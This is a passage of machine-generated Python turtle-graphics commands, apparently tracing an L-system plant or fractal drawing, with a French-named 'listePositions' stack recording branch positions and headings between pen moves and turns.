pu(), setposition((78.67,253.92)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,211.82), 67.5), ((78.67,253.92), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((78.67,253.92)), setheading(45.0) ;
pu(), setposition((61.23,211.82)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((67.35,226.60), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((67.35,226.60)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((67.35,226.60), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((67.35,226.60)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((73.48,241.38)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((73.48,241.38)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((88.26,247.51), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((88.26,247.51)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((88.26,247.51), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((88.26,247.51)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((99.57,258.82), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((99.57,258.82)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((99.57,258.82), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((99.57,258.82)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((105.69,273.60), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((105.69,273.60)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((105.69,273.60), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((105.69,273.60)), setheading(67.5) ;
pu(), setposition((73.48,241.38)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,257.38), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((73.48,257.38)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,257.38), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((73.48,257.38)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((79.60,272.17), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((79.60,272.17)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((79.60,272.17), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((79.60,272.17)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((90.91,283.48), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((90.91,283.48)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((90.91,283.48), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((90.91,283.48)), setheading(45.0) ;
pu(), setposition((73.48,241.38)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((88.26,247.51), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((88.26,247.51)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((88.26,247.51), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((88.26,247.51)), setheading(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((103.04,253.63), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((103.04,253.63)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((103.04,253.63), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((103.04,253.63)), setheading(22.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((103.04,253.63), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((103.04,253.63), 0.0), ((117.82,247.51), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((117.82,247.51)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((103.04,253.63), 0.0), ((117.82,247.51), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((117.82,247.51)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((103.04,253.63), 0.0), ((133.82,247.51), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((133.82,247.51)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((103.04,253.63), 0.0), ((133.82,247.51), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((133.82,247.51)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((103.04,253.63), 0.0), ((148.60,253.63), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((148.60,253.63)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((103.04,253.63), 0.0), ((148.60,253.63), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((148.60,253.63)), setheading(22.5) ;
pu(), setposition((103.04,253.63)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((103.04,253.63), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((103.04,253.63), 22.5), ((114.35,264.94), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((114.35,264.94)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((103.04,253.63), 22.5), ((114.35,264.94), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((114.35,264.94)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((103.04,253.63), 22.5), ((129.14,271.07), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((129.14,271.07)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((103.04,253.63), 22.5), ((129.14,271.07), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((129.14,271.07)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((103.04,253.63), 22.5), ((145.14,271.07), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((145.14,271.07)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((103.04,253.63), 22.5), ((145.14,271.07), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((145.14,271.07)), setheading(0.0) ;
pu(), setposition((103.04,253.63)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((114.35,264.94), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((114.35,264.94)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((114.35,264.94), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((114.35,264.94)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((125.67,276.26), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((125.67,276.26)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((125.67,276.26), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((125.67,276.26)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((125.67,276.26), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((125.67,276.26), 22.5), ((141.67,276.26), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((141.67,276.26)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((125.67,276.26), 22.5), ((141.67,276.26), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((141.67,276.26)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((125.67,276.26), 22.5), ((156.45,282.38), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((156.45,282.38)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((125.67,276.26), 22.5), ((156.45,282.38), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((156.45,282.38)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((125.67,276.26), 22.5), ((167.76,293.69), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((167.76,293.69)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((125.67,276.26), 22.5), ((167.76,293.69), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((167.76,293.69)), setheading(45.0) ;
pu(), setposition((125.67,276.26)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((125.67,276.26), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((125.67,276.26), 45.0), ((131.79,291.04), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((131.79,291.04)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((125.67,276.26), 45.0), ((131.79,291.04), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((131.79,291.04)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((125.67,276.26), 45.0), ((143.10,302.35), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((143.10,302.35)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((125.67,276.26), 45.0), ((143.10,302.35), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((143.10,302.35)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((125.67,276.26), 45.0), ((157.89,308.48), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((157.89,308.48)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((125.67,276.26), 45.0), ((157.89,308.48), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((157.89,308.48)), setheading(22.5) ;
pu(), setposition((125.67,276.26)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((131.79,291.04), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((131.79,291.04)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((131.79,291.04), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((131.79,291.04)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((137.91,305.82), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((137.91,305.82)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((137.91,305.82), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((137.91,305.82)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((137.91,305.82), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((137.91,305.82), 45.0), ((152.69,311.95), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((152.69,311.95)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((137.91,305.82), 45.0), ((152.69,311.95), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((152.69,311.95)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((137.91,305.82), 45.0), ((164.01,323.26), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((164.01,323.26)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((137.91,305.82), 45.0), ((164.01,323.26), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((164.01,323.26)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((137.91,305.82), 45.0), ((170.13,338.04), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((170.13,338.04)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((137.91,305.82), 45.0), ((170.13,338.04), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((170.13,338.04)), setheading(67.5) ;
pu(), setposition((137.91,305.82)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((137.91,305.82), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((137.91,305.82), 67.5), ((137.91,321.82), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((137.91,321.82)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((137.91,305.82), 67.5), ((137.91,321.82), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((137.91,321.82)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((137.91,305.82), 67.5), ((144.04,336.60), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((144.04,336.60)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((137.91,305.82), 67.5), ((144.04,336.60), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((144.04,336.60)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((137.91,305.82), 67.5), ((155.35,347.92), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((155.35,347.92)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((137.91,305.82), 67.5), ((155.35,347.92), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((155.35,347.92)), setheading(45.0) ;
pu(), setposition((137.91,305.82)), setheading(67.5) ;
pu(), setposition((73.48,241.38)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,257.38), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((73.48,257.38)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,257.38), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((73.48,257.38)), setheading(90.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,273.38), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((73.48,273.38)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,273.38), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((73.48,273.38)), setheading(90.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,273.38), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,273.38), 67.5), ((84.79,284.70), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((84.79,284.70)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,273.38), 67.5), ((84.79,284.70), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((84.79,284.70)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,273.38), 67.5), ((90.91,299.48), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((90.91,299.48)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,273.38), 67.5), ((90.91,299.48), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((90.91,299.48)), setheading(67.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,273.38), 67.5), ((90.91,315.48), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((90.91,315.48)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,273.38), 67.5), ((90.91,315.48), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((90.91,315.48)), setheading(90.0) ;
pu(), setposition((73.48,273.38)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,273.38), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
